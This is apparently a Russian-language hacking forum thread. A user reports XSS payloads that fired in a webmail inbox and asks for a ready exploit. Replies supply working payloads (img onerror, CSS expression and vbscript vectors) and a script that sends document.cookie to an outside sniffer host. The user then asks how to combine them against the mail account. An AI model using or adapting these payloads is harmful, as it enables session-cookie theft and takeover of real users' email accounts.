привет вот ротестил одно мыло хсс тестером
проверил мыло
эти дали алерт


<image src="" onerror=alert(8)>
<image src='' onerror=alert(9)>
<img src="" onerror=alert(10)>
<span sss="alert(21);this.sss=null" style=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' style=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null style=top:expression(eval(this.sss));></span>
<style type="text/css">@import url(vbscript:alert(38));</style>


тепер используя это что мне отправит чтобы внедрить antichat.ru/cgi-bin/s.jpg
плз ес можете дайте готовый сплоит или чо то в этом роде

Ни кто не отвечает? слишком уж изЪеженная эта тема про Xss и на форуме можно найти все что надо .
Главное пользоватся поиском=) А на каком почтовике находится мыло???

очен прощу хелп
искал не нащел

эм....

# Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
# Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
# Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

http://antichat.ru/sniff/

ок тепер где надо вставит это :
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
в этом
<img src="" onerror=alert(10)>

thank